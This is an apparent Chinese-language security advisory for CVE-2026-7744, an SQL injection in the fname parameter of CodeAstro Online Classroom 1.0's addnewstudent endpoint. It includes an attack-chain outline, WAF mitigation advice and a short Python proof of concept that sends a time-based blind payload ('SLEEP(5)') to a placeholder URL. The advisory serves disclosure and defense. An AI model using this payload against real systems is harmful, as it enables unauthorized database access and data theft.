CVE-2026-7744 CVSS 6.3 中危

CVE-2026-7744 CodeAstro Online Classroom SQL注入漏洞

披露日期: 2026-05-04

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-7744

漏洞类型

SQL注入

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

CodeAstro Online Classroom

漏洞概述

CodeAstro Online Classroom 1.0版本中存在一处安全漏洞，具体位于/OnlineClassroom/addnewstudent文件的处理逻辑中。该漏洞源于对用户输入的fname参数缺乏有效的过滤，导致攻击者可进行SQL注入攻击。由于攻击可远程发起且无需用户交互，结合已公开的利用代码，该漏洞对数据安全构成一定威胁。

技术细节

该漏洞的成因是CodeAstro Online Classroom 1.0在/OnlineClassroom/addnewstudent接口处理学生姓名（fname）参数时，未采用参数化查询或严格的输入验证机制，直接将不可信数据拼接至SQL查询语句中。攻击者可通过发送包含恶意SQL代码的HTTP请求，操纵后端数据库执行非预期指令。根据CVSS 3.1向量（CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L），攻击者仅需低权限账号即可通过网络利用此漏洞。成功利用可能导致敏感数据泄露（C:L）、数据篡改（I:L）及服务可用性受损（A:L）。

攻击链分析

STEP 1

侦察

攻击者识别出目标系统运行的是CodeAstro Online Classroom 1.0，并定位到/OnlineClassroom/addnewstudent接口。

STEP 2

漏洞探测

攻击者在fname参数中注入SQL测试语句（如单引号或逻辑判断），观察应用响应以确认SQL注入漏洞的存在。

STEP 3

构造攻击载荷

根据探测结果，攻击者构造恶意的SQL语句，旨在提取数据库信息、绕过认证或修改数据。

STEP 4

执行攻击

攻击者发送包含恶意载荷的HTTP POST请求至服务器，后端数据库执行注入的SQL命令。

STEP 5

达成目标

攻击者成功获取敏感数据（如用户凭据）、篡改数据库内容或导致服务响应延迟。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests # Target URL vulnerable to SQL Injection target_url = "http://target.com/OnlineClassroom/addnewstudent" # Payload for SQL Injection (Time-based blind example) # The 'fname' parameter is the injection point payload_data = { "fname": "test' OR SLEEP(5)--", # Malicious SQL payload "lname": "user", "email": "[email protected]" } try: response = requests.post(target_url, data=payload_data) # Check if the response time indicates successful execution (e.g., > 5 seconds) if response.elapsed.total_seconds() >= 5: print("[+] Vulnerability Confirmed: SQL Injection successful.") else: print("[-] Vulnerability not detected or payload failed.") except Exception as e: print(f"[!] Error occurred: {e}")

影响范围

CodeAstro Online Classroom 1.0

防御指南

临时缓解措施

建议在Web应用防火墙（WAF）中添加针对该接口的SQL注入防护规则，严格拦截包含单引号、UNION、SELECT等关键字符的请求。若非必须，可暂时限制对/OnlineClassroom/addnewstudent接口的网络访问，或仅允许可信IP访问，直到彻底修复漏洞。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-7744
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-7744
3 Details https://www.cvedetails.com/cve/CVE-2026-7744/
4 VulDB https://vuldb.com/cve/CVE-2026-7744
5 Link https://codeastro.com/
6 Link https://github.com/yuji0903/silver-guide/issues/21
7 Link https://vuldb.com/submit/807696
8 Link https://vuldb.com/vuln/360919
9 Link https://vuldb.com/vuln/360919/cti

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表